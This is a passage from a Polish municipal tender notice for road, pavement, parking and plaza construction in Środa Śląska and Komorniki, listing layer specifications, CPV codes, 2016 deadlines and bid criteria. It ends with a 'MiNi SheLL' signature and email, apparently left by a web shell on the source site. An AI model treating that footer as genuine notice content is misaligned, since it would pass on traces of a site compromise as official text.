- piasek stabilizowany cementem Rm=2,5 MPa gr. 25 cm
Nawierzchnię należy obramować krawężnikiem betonowym 15x30 cm
posadowionym na ławie bet. C12/15 gr. 12 cm z oporem, a od strony spadku  krawężnikiem betonowym wtopionym najazdowym 15x22 cm.
Na szerokości zjazdów należy wbudować krawężnik betonowy najazdowy obniżony do 2 cm ponad poziom krawędzi jezdni.
Ściek należy wykonać z 2 rzędów kostki betonowej 10x20x8 cm posadowionej na ławie betonowej C12/15 gr. 24 cm.
ODWODNIENIE
Odwodnienie realizowane będzie powierzchniowo w teren poprzez spadki poprzeczne i podłużne nawierzchni powierzchniowo w teren. Dla odwodnienia projektowanej nawierzchni na odcinku o długości 60 m zaprojektowano ściek otwarty z 2 rzędów kostki betonowej.
ROBOTY ZIEMNE
Zasadnicze roboty ziemne sprowadzają się do wykonana korytowania i profilowania dna koryta.
Dno koryta lub górę nasypu należy zagęścić do uzyskania wskaźnika zagęszczenia Is1,0.
2. Budowa nawierzchni drogi ul. Brodatego i części ul. Probusa w Środzie Ślaskiej wraz z kanalizacją deszczową
Projektuje się jezdnię szer. 5,00 m na długości 136 mb. Jezdnia będzie posiadała spadek
daszkowy.
Po stronie zabudowy (wschodniej) projektuje się chodnik jednostronny.
Chodnik będzie posiadał szerokość 1,50 m i spadek jednostronny w kierunku jezdni wielkości 2%. W ciągu zjazdów spadek poprzeczny chodnika zostanie dostosowany do spadku projektowanych zjazdów.
Projektowane zjazdy będą posiadały szer. 3,50-5,00m. Zostaną włączone do jezdni skosami 1,5x1,5m.
Szczegóły  rozwiązań sytuacyjnych i  wysokościowych pokazano na planszy drogowej.
konstrukcja nawierzchni
Dla projektowanych nawierzchni przewidziano następujący układ warstw konstrukcyjnych:
Jezdnia:
- kostka bet. szara gr. 8 cm
- podsypka cem-piask. 1:4 gr. 3 cm
- kruszywo łamane stab. mechanicznie 0/31,5 gr. 10 cm
- kruszywo łamane stab. mechanicznie 0/63 gr. 20 cm
- piasek stab. cementem Rm=2,5 MPa gr. 15 cm
Zjazdy:
- kostka bet. grafitowa gr. 8 cm
- podsypka cem-piask. 1:4 gr. 3 cm
- kruszywo łamane stab. mechanicznie 0/63 gr. 15 cm
- pospółka gr. 20 cm
Chodniki/dojścia do furtek:
- kostka bet. szara gr. 8 cm
- podsypka cem-piask. 1:4 gr. 3 cm
- kruszywo łamane stab. mechanicznie 0/31,5 gr. 10 cm
- pospółka gr. 10 cm
Nawierzchnię jezdni należy obramować krawężnikiem bet. 15x30 cm na ławie bet. C12/15 gr. 15 cm z oporem.
Od  strony  zabudowy  należy  użyć krawężnika  najazdowego  obniżonego  na całej długości do 3 cm ponad poziom krawędzi jezdni.
Nawierzchnię chodników oraz zjazdów należy obramować obrzeżem betonowym 8x25 cm posadowionym na ławie bet. C12/15 gr. 12 cm z oporem.
Wzdłuż krawężników należy wykonać ściek z 2 rzędów kostki bet. Typu Holland na ławie betonowej wspólnej z krawężnikiem.
Szczegóły rozwiązań konstrukcyjnych pokazano na przekrojach konstrukcyjnych.
odwodnienie
Odwodnienie realizowane będzie przez spadki poprzeczne i podłużne nawierzchni do projektowanych oraz istniejących wpustów ulicznych kanalizacji deszczowej.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233140-2, 45232130-2,
                    45316110-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/11/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena zamówienia</td><td>60</td></tr><tr><td>termin wykonania zamówienia </td><td>11</td></tr><tr><td>termin wykonania zamówienia </td><td>22</td></tr><tr><td>termin płatności </td><td>7</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>1. Budowa chodnika przy ul. Szkolnej i M. C. Skłodowskiej w Środzie Śląskiej  I ETAP 2. Budowa ciągu pieszo jezdnego łączącego ul. Wierzbową z osiedlem mieszkaniowym SM w Środzie Śląskiej, 3. Budowa chodnika  w miejscowości Komorniki w ramach zadania poprawa bezpieczeństwa na kluczowych odcinkach dróg na terenie miasta i gminy Środa Śląska,<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Budowa chodnika przy ul. Szkolnej  i ul. M.C. Skłodowskiej w Środzie Ślaskiej  I etap 
W ramach niniejszego projektu zostanie wykonany jednostronny chodnik uliczny wzdłuż ul. Szkolnej i ul. Marii Curie Skłodowskiej. Chodnik ten, w nawiązaniu do istniejącej szerokości chodnika, będzie posiadał szer. 1,75 m. W ramach niniejszego projektu zostaną także przebudowane istniejące zjazdy oraz wykonane dojścia do poszczególnych posesji oraz boksów śmietnikowych. Wykonane zostaną także zjazdy na niezagospodarowane działki budowlane. Projektowany chodnik będzie posiadał spadek jednostronny w kierunku jezdni wielkości 2%. W ciągu zjazdów spadek poprzeczny chodnika zostanie dostosowany do spadku nawierzchni zjazdu. Wysokościowo projektowany chodnik zostanie dostosowany do niwelety istniejącego krawężnika. Istniejący krawężnik uliczny pozostaje bez zmian. Zjazdy zostaną wykonane o szerokości dostosowanej do szerokości istniejących bram i zjazdów.W ramach niniejszego projektu zostanie także wykonane przejście dla pieszych przez ul. Mickiewicza szer. 4,0 m. Na wysokości przejścia dla pieszych istniejący  krawężnik  uliczny zostanie  obniżony  do  2  cm  ponad  poziom krawędzi jezdni.
konstrukcja nawierzchni
Dla projektowanych nawierzchni przewidziano następujący układ warstw konstrukcyjnych:
Zjazdy:
- kostka bet. grafitowa gr. 8 cm
- podsypka cem-piask. 1:4 gr. 3 cm
- kruszywo łamane stab. mechanicznie 0/63 gr. 15 cm
- pospółka gr. 20 cm
Chodniki / dojścia do furtek:
- kostka bet. szara gr. 8 cm
- podsypka cem-piask. 1:4 gr. 3 cm
- kruszywo łamane stab. mechanicznie 0/31,5 gr. 10 cm
- pospółka gr. 10 cm
Nawierzchnię chodników oraz zjazdów należy obramować obrzeżem betonowym 8x25cm posadowionym na ławie bet. C12/15 gr. 12 cm z oporem.
Projektowane zjazdy należy dowiązać do istniejącego obniżonego krawężnika ulicznego. Przy nowych zjazdach należy wbudować krawężnik najazdowy 15x22cm obniżony do 2 cm ponad poziom krawędzi jezdni. Na wysokości przejścia dla pieszych istn. krawężnik należy obniżyć do 2 cm ponad poziom krawędzi jezdni. Krawężniki należy posadawiać na ławie bet. C12/15 gr. 15 cm z oporem. S
 odwodnienie
Odwodnienie powierzchniowe realizowane będzie przez spadki poprzeczne i podłużne projektowanych zjazdów i chodników  do istniejących wpustów ulicznych kanalizacji deszczowej zlokalizowanych w jezdniach poszczególnych ulic.
2. Budowa ciągu pieszo jezdnego łączącego ul. Wierzbową z osiedlem mieszkaniowym SM w Środzie Ślaskiej  
Długość ciągu pieszo jezdnego 70 mb i szerokości 4 m.
nawierzchnia:
- kostka bet. szara gr. 8 cm
- podsypka cem-piask. 1:4 gr. 3 cm
- kruszywo łamane stab. mechanicznie 0/63 gr. 15 cm
- pospółka gr. 20 cm
gr. 10 cm
Nawierzchnię chodników oraz zjazdów należy obramować obrzeżem betonowym 8x25cm posadowionym na ławie bet. C12/15 gr. 12 cm z oporem.
2. Budowa chodnika w miejscowości Komorniki 
Długość chodnika z kostki betonowej szarej wynosi 122 mb i szerokości od 1,30 do 1,65m . Zmienna szerokość wynika z warunków terenowych i zabudowy. Chodnik zostanie oddzielony od jezdni za pomocą krawężników kamiennych z odzysku i krawężników betonowych o wymiarach 15x 30 cm w miejscu braku krawężników betonowych. Zewnętrzne krawędzie chodnika zostaną zabezpieczone obrzeżami betonowymi o wymiarach 8x30 cm. Krawężniki jak i obrzeza zostaną posadowione na ławie z betonu klasy  C12/15
nawierzchnia chodników z kostki betonowej szarej gr 8 cm układana na podsypce cementowo-piaskowej. Podbudowa wykonana z kruszywa łamanego stabilizowanego mechanicznie o gr 10 cm. <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233140-2, 45232130-2,
                    45316110-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 11/12/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena zamówienia</td><td>60</td></tr><tr><td>termin wykonania zamówienia </td><td>11</td></tr><tr><td>termin wykonania zamówienia </td><td>22</td></tr><tr><td>termin płatności </td><td>7</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>ewitalizacja gminnego placu przy ul. Kościuszki 60 w Środzie Śląskiej<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Rewitalizacja gminnego placu przy ul. Kościuszki 60 w Środzie Ślaskiej  Kanalizacja deszczowa :
Rurociąg z rur PVC SN 8  200  41m, PVC SN 8 160 - 54,8m
Wpusty uliczne w ilości 3szt. 
Studnie rewizyjne betonowe  1000 - 3szt.
Studnia rewizyjna 600 - 1szt.
Nawierzchnie z kostki granitowej :
Chodniki z płyt granitowych groszkowanych 600x600mm i grubości 100mm i powierzchni 14m2
Chodniki z płyt granitowych groszkowanych 600x600mm i grubości 60mm i powierzchni 52m2
Wypełnienie wykonywanych chodników z płyt kostką granitową 4/6 na powierzchni 78m2
Plac z kostki brukowej granitowej 8/11 na powierzchni 589m2.
Oświetlenie :
Oprawy oświetleniowe stylizowane (metalowe np. firmy ART METAL) ledowe o mocy 39W  - szt. 4 montowane na słupach aluminiowych stylizowanych.           
Linia zasilająca projektowane oprawy oświetleniowe YAKY 4x16mm2 i L=116m<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233140-2, 45232130-2,
                    45316110-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 18/12/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena zamówienia</td><td>22</td></tr><tr><td>termin wykonania zamówienia</td><td>11</td></tr><tr><td>gwaracja</td><td>22</td></tr><tr><td>termin płatości</td><td>7</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Budowa parkingu przy ul. Polnej nr 17 A  - 17 B w podstrefie LSSE w Komornikach <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>- opracowanie dokumentacji projektowej parkingu dla branży drogowej i sanitarnej wraz z 	dokonaniem zgłoszenia robót lub pozwolenia na budowę
	- korytowanie placu parkingu na gł  20 cm  pow ca 1 158 m2
	- formowanie nasypów z pospółki o śr grubości 40 cm pow ca 1 158 m2
	- wykonanie gruntu stabilizowanego cementem gr 15 cm na pow ca 1 158 m2
	- wykonanie dolnej warstwy kruszywem 0/63 o gr 15  na pow  ca 1158 m2
	- wykonanie dolnej warstwy kruszywem 0/31,5 o gr 10  na pow ca  1158 m2
	- wykonanie nawierzchni z kostki betonowej szarej gr  8 cm na pow ca  1 158 m2
	- obramowanie placu postojowego krawężnikami drogowymi 15x30x100 na ławach betonowych z 	oporem
	- wykonanie odwodnienia placu parkingu<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233140-2, 45232130-2,
                    45316110-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 02/12/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena zamówienia</td><td>60</td></tr><tr><td>termin wykonania zamówienia</td><td>11</td></tr><tr><td>gwarancja</td><td>22</td></tr><tr><td>termin płatności </td><td>7</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com